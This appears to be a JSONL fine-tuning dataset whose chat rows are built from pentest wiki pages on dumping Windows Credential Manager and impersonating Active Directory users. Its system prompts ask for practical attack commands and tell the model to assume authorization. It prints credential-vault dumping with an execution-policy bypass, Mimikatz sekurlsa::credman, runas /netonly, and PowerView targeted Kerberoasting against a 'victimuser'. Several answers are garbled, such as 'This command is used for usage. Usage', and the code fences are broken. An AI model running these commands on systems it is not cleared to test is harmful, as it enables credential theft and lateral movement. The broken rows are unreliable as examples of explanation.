Theory in the context of penetration testing", "response": "Windows Credential Manager is a built-in feature that securely stores sensitive login information for websites, applications, and networks. It houses login credentials such as usernames, passwords, and web addresses. There are four distinct categories of stored credentials:\n\n1. Web-based credentials: authentication details saved in web browsers (or other applications)\n2. Windows-specific credentials: authentication data such as NTLM or Kerberos\n3. Generic credentials: fundamental authentication data, such as clear-text usernames and passwords\n4. Certificate-based credentials: comprehensive information based on certificates", "metadata": {"corpus_index": 373, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Windows Credential Manager - Theory"}, {"role": "assistant", "content": "Windows Credential Manager is a built-in feature that securely stores sensitive login information for websites, applications, and networks. It houses login credentials such as usernames, passwords, and web addresses. There are four distinct categories of stored credentials:\n\n1. Web-based credentials: authentication details saved in web browsers (or other applications)\n2. Windows-specific credentials: authentication data such as NTLM or Kerberos\n3. Generic credentials: fundamental authentication data, such as clear-text usernames and passwords\n4. Certificate-based credentials: comprehensive information based on certificates"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Windows Credential Manager - Theory", "response": "Windows Credential Manager is a built-in feature that securely stores sensitive login information for websites, applications, and networks. It houses login credentials such as usernames, passwords, and web addresses. There are four distinct categories of stored credentials:\n\n1. Web-based credentials: authentication details saved in web browsers (or other applications)\n2. Windows-specific credentials: authentication data such as NTLM or Kerberos\n3. Generic credentials: fundamental authentication data, such as clear-text usernames and passwords\n4. Certificate-based credentials: comprehensive information based on certificates", "metadata": {"corpus_index": 373, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Windows Credential Manager - Practice"}, {"role": "assistant", "content": "From Windows systems, vaultcmd.exe can be used to enumerate, check and list Microsoft Credentials. However, this tool does not allow to see clear text passwords as it is an official, native, Windows program.\n\n``powershell\n#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\"\n`\n\nThe vault can be dumped in with Get-WebCredentials.ps1 (PowerShell) .\n\n`powershell\npowershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials\n`\n\nAlternatively, Mimkatz (C) can be used for that purpose, with sekurlsa::credman`."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Windows Credential Manager - Practice", "response": "From Windows systems, vaultcmd.exe can be used to enumerate, check and list Microsoft Credentials. However, this tool does not allow to see clear text passwords as it is an official, native, Windows program.\n\n``powershell\n#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\"\n`\n\nThe vault can be dumped in with Get-WebCredentials.ps1 (PowerShell) .\n\n`powershell\npowershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials\n`\n\nAlternatively, Mimkatz (C) can be used for that purpose, with sekurlsa::credman`.", "metadata": {"corpus_index": 374, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Windows Credential Manager - Practice"}, {"role": "assistant", "content": "From Windows systems, vaultcmd.exe can be used to enumerate, check and list Microsoft Credentials. However, this tool does not allow to see clear text passwords as it is an official, native, Windows program.\n\n``powershell\n#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\"\n`\n\nThe vault can be dumped in with Get-WebCredentials.ps1 (PowerShell) .\n\n`powershell\npowershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials\n`\n\nAlternatively, Mimkatz (C) can be used for that purpose, with sekurlsa::credman`."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Windows Credential Manager - Practice", "response": "From Windows systems, vaultcmd.exe can be used to enumerate, check and list Microsoft Credentials. However, this tool does not allow to see clear text passwords as it is an official, native, Windows program.\n\n``powershell\n#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\"\n`\n\nThe vault can be dumped in with Get-WebCredentials.ps1 (PowerShell) .\n\n`powershell\npowershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials\n`\n\nAlternatively, Mimkatz (C) can be used for that purpose, with sekurlsa::credman`.", "metadata": {"corpus_index": 374, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the enumerate command to 🛠️ windows credential manager - practice"}, {"role": "assistant", "content": "#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the enumerate command to 🛠️ windows credential manager - practice", "response": "#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\"", "metadata": {"corpus_index": 375, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "enumerate"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Windows Credential Manager - Practice"}, {"role": "assistant", "content": "#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Windows Credential Manager - Practice", "response": "#enumerate current Windows safes available\nvaultcmd /list\n\n#Check for credentials stored in the vault\nVaultCmd /listproperties:\"$coffre_name\"\n\n#more information about the Vault \nVaultCmd /listcreds:\"$coffre_name\"", "metadata": {"corpus_index": 375, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the powershell syntax for 🛠️ windows credential manager - practice?"}, {"role": "assistant", "content": "powershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the powershell syntax for 🛠️ windows credential manager - practice?", "response": "powershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials", "metadata": {"corpus_index": 376, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "powershell"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Windows Credential Manager - Practice during a pentest?"}, {"role": "assistant", "content": "powershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Windows Credential Manager - Practice during a pentest?", "response": "powershell -ex bypass\n\nImport-Module C:\\Get-WebCredentials.ps1\n\nGet-WebCredentials", "metadata": {"corpus_index": 376, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `powershell -ex bypass`?"}, {"role": "assistant", "content": "This command is used for 🛠️ windows credential manager - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `powershell -ex bypass`?", "response": "This command is used for 🛠️ windows credential manager - practice. Practice", "metadata": {"corpus_index": 376, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/windows-credential-manager.md", "page_title": "🛠️ Windows Credential Manager", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Impersonation work?"}, {"role": "assistant", "content": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.\n\n* LM or NT password hash: pass-the-hash\n* RC4 Kerberos key (i.e. NT hash): overpass-the-hash\n* non-RC4 Kerberos key (i.e. DES or AES): pass-the-key (alias for overpass-the-hash)\n* Kerberos ticket: pass-the-ticket\n* plaintext password: the techniques listed below\n\n::: tabs\n\n=== RunAs\n\nRunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only.\n\n``bash\nrunas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"\n`\n\nSince the password cannot be supplied as an argument, the session must be interactive.\n\n=== Powershell\n\nIn Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Impersonation work?", "response": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.\n\n* LM or NT password hash: pass-the-hash\n* RC4 Kerberos key (i.e. NT hash): overpass-the-hash\n* non-RC4 Kerberos key (i.e. DES or AES): pass-the-key (alias for overpass-the-hash)\n* Kerberos ticket: pass-the-ticket\n* plaintext password: the techniques listed below\n\n::: tabs\n\n=== RunAs\n\nRunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only.\n\n``bash\nrunas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"\n`\n\nSince the password cannot be supplied as an argument, the session must be interactive.\n\n=== Powershell\n\nIn Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.\n\n``bash", "metadata": {"corpus_index": 377, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Impersonation"}, {"role": "assistant", "content": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.\n\n* LM or NT password hash: pass-the-hash\n* RC4 Kerberos key (i.e. NT hash): overpass-the-hash\n* non-RC4 Kerberos key (i.e. DES or AES): pass-the-key (alias for overpass-the-hash)\n* Kerberos ticket: pass-the-ticket\n* plaintext password: the techniques listed below\n\n::: tabs\n\n=== RunAs\n\nRunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only.\n\n``bash\nrunas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"\n`\n\nSince the password cannot be supplied as an argument, the session must be interactive.\n\n=== Powershell\n\nIn Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Impersonation", "response": "When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.\n\n* LM or NT password hash: pass-the-hash\n* RC4 Kerberos key (i.e. NT hash): overpass-the-hash\n* non-RC4 Kerberos key (i.e. DES or AES): pass-the-key (alias for overpass-the-hash)\n* Kerberos ticket: pass-the-ticket\n* plaintext password: the techniques listed below\n\n::: tabs\n\n=== RunAs\n\nRunAs is a standard Windows command that allows to execute a program under a different user account. When stuffing an Active Directory account's password, the /netonly flag must be set to indicate the credentials are to be used for remote access only.\n\n``bash\nrunas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"\n`\n\nSince the password cannot be supplied as an argument, the session must be interactive.\n\n=== Powershell\n\nIn Powershell, it is possible to impersonate a user by create a credential object and supplying it with the -Credential argument in the next command.\n\n``bash", "metadata": {"corpus_index": 377, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the runas syntax for impersonation?"}, {"role": "assistant", "content": "runas /netonly /user:$DOMAIN\\$USER \"powershell.exe\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the runas syntax for impersonation?", "response": "runas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"", "metadata": {"corpus_index": 378, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "runas"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Impersonation?"}, {"role": "assistant", "content": "runas /netonly /user:$DOMAIN\\$USER \"powershell.exe\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Impersonation?", "response": "runas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"", "metadata": {"corpus_index": 378, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `runas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"`?"}, {"role": "assistant", "content": "This command is used for impersonation. Impersonation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `runas /netonly /user:$DOMAIN\\$USER \"powershell.exe\"`?", "response": "This command is used for impersonation. Impersonation", "metadata": {"corpus_index": 378, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Credential object creation (not prompted)?"}, {"role": "assistant", "content": "$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force\n$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\\user_to_run_as', $password)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Credential object creation (not prompted)?", "response": "$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force\n$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\\user_to_run_as', $password)", "metadata": {"corpus_index": 379, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Credential object creation (not prompted)?"}, {"role": "assistant", "content": "$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force\n$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\\user_to_run_as', $password)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Credential object creation (not prompted)?", "response": "$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force\n$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\\user_to_run_as', $password)", "metadata": {"corpus_index": 379, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Usage work?"}, {"role": "assistant", "content": "Start-Process Notepad.exe -Credential $credential\n``\n\n=== PowerView\n\nMost of PowerView's functions have the -Credential, -Domain and -Server parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous \"Powershell\" tab, the -Credential option has to be supplied with a credential object.\n\nHere is an example for targeted Kerberoasting.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Usage work?", "response": "Start-Process Notepad.exe -Credential $credential\n``\n\n=== PowerView\n\nMost of PowerView's functions have the -Credential, -Domain and -Server parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous \"Powershell\" tab, the -Credential option has to be supplied with a credential object.\n\nHere is an example for targeted Kerberoasting.\n\n``bash", "metadata": {"corpus_index": 380, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Usage"}, {"role": "assistant", "content": "Start-Process Notepad.exe -Credential $credential\n``\n\n=== PowerView\n\nMost of PowerView's functions have the -Credential, -Domain and -Server parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous \"Powershell\" tab, the -Credential option has to be supplied with a credential object.\n\nHere is an example for targeted Kerberoasting.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Usage", "response": "Start-Process Notepad.exe -Credential $credential\n``\n\n=== PowerView\n\nMost of PowerView's functions have the -Credential, -Domain and -Server parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous \"Powershell\" tab, the -Credential option has to be supplied with a credential object.\n\nHere is an example for targeted Kerberoasting.\n\n``bash", "metadata": {"corpus_index": 380, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Usage?"}, {"role": "assistant", "content": "=== PowerView\n\nMost of [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)'s functions have the `-Credential`, `-Domain` and `-Server` parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous \"Powershell\" tab, the -Credential option has to be supplied with a credential object.\n\nHere is an example for [targeted Kerberoasting](../dacl/targeted-kerberoasting.md)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Usage?", "response": "=== PowerView\n\nMost of [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)'s functions have the `-Credential`, `-Domain` and `-Server` parameters that can be used to explicitly specify the user to run as, the target Domain and and the target Domain Controller. Just like the previous \"Powershell\" tab, the -Credential option has to be supplied with a credential object.\n\nHere is an example for [targeted Kerberoasting](../dacl/targeted-kerberoasting.md).", "metadata": {"corpus_index": 381, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== PowerView`?"}, {"role": "assistant", "content": "This command is used for usage. Usage"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== PowerView`?", "response": "This command is used for usage. Usage", "metadata": {"corpus_index": 381, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Usage"}, {"role": "assistant", "content": "Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}\n$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'\n$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl\n``\n\n:::\n\nSharpLdapWhoami can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).\n\n`powershell\n.\\SharpLdapWhoami.exe\n.\\SharpLdapWhoami.exe /method:kerberos /all\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Usage", "response": "Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}\n$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'\n$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl\n``\n\n:::\n\nSharpLdapWhoami can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).\n\n`powershell\n.\\SharpLdapWhoami.exe\n.\\SharpLdapWhoami.exe /method:kerberos /all\n``", "metadata": {"corpus_index": 382, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Usage?"}, {"role": "assistant", "content": "Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}\n$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'\n$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl\n``\n\n:::\n\nSharpLdapWhoami can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).\n\n`powershell\n.\\SharpLdapWhoami.exe\n.\\SharpLdapWhoami.exe /method:kerberos /all\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Usage?", "response": "Set-DomainObject -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}\n$User = Get-DomainUser -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'\n$User | Get-DomainSPNTicket -Credential $Cred -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl\n``\n\n:::\n\nSharpLdapWhoami can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).\n\n`powershell\n.\\SharpLdapWhoami.exe\n.\\SharpLdapWhoami.exe /method:kerberos /all\n``", "metadata": {"corpus_index": 382, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/impersonation.md", "page_title": "Impersonation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Usage during a pentest?"}, {"role": "assistant", "content": ":::\n\n\n[SharpLdapWhoami](https://github.com/bugch3ck/SharpLdapWhoami) can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Usage during a pentest?", "response": ":::\n\n\n[SharpLdapWhoami](https://github.com/bugch3ck/SharpLdapWhoami) can then be used to make sure the user is correctly impersonated. A standard whoami command will only return the local user rights, not the users impersonated during remote operations (like LDAP queries to the DC).", "metadata": {"corpus_index": 383, "category": "credentials", 